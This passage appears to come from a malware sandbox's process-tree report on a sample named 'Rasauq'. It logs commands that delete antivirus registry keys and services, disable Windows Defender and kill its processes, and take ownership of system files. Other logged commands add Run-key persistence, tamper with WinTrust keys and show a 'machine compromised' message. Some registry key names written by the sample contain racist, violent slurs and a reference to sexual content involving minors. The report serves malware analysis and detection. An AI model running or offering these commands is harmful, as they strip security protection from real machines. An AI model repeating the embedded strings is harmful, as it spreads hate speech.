      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:4560
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:4052
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:4044
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:5684
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:1824
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:5828
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:5224
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:3224
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:2280
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:1148
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4072
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:5300
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:1504
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:3752
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:1400
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:3808
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      PID:4500
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:3004
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      PID:416
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:2976
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:1656
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      PID:5212
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      PID:2468
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      PID:4168
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      PID:1680
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5284
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3328
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3764
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3916
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:2824
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      Modifies security service
      PID:3480
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:1976
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:5716
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6092
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5692
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5512
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4932
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5056
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2648
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      PID:4128
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      PID:3936
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      PID:308
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:3024
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:5368
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:5944
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:5356
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:4332
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:1672
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:2312
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:2972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:4024
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:4496
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:560
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3780
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:3504
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1156
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2940
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:3180
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:468
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:4236
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:2616
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:2400
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5624
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5500
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3736
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:2308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3800
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3628
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5372
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      PID:5964
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:1052
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 22 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:6048
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:3028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=1742467040071
      4⤵
      PID:4436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=1742467040071
        5⤵
        Drops file in Windows directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x288,0x7fffa6acf208,0x7fffa6acf214,0x7fffa6acf220
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2132
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
        6⤵
        
        PID:4092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2192,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:2
        6⤵
        
        PID:3916
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:8
        6⤵
        
        PID:3604
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:1
        6⤵
        
        PID:3472
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
        6⤵
        
        PID:3448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4932,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=4920 /prefetch:1
        6⤵
        
        PID:3936
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
        6⤵
        
        PID:6116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5100,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:8
        6⤵
        
        PID:2904
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5744,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:8
        6⤵
        
        PID:3660
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
        6⤵
        
        PID:572
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
        6⤵
        
        PID:5864
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6392,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:1
        6⤵
        
        PID:5680
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6484,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:1
        6⤵
        
        PID:1556
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6608,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6480 /prefetch:1
        6⤵
        
        PID:2528
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6280,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:1
        6⤵
        
        PID:5240
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6488,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:1
        6⤵
        
        PID:2984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=7072,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7100 /prefetch:1
        6⤵
        
        PID:5056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7368,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7336 /prefetch:1
        6⤵
        
        PID:1768
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7364,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:1
        6⤵
        
        PID:1092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7760 /prefetch:8
        6⤵
        
        PID:4436
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7740,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=600 /prefetch:8
        6⤵
        
        PID:5408
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7748,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7712 /prefetch:8
        6⤵
        
        PID:1800
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7272,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7628 /prefetch:1
        6⤵
        
        PID:760
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7280,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:1
        6⤵
        
        PID:2804
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=3476,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:1
        6⤵
        
        PID:5948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7992,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1
        6⤵
        
        PID:2800
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
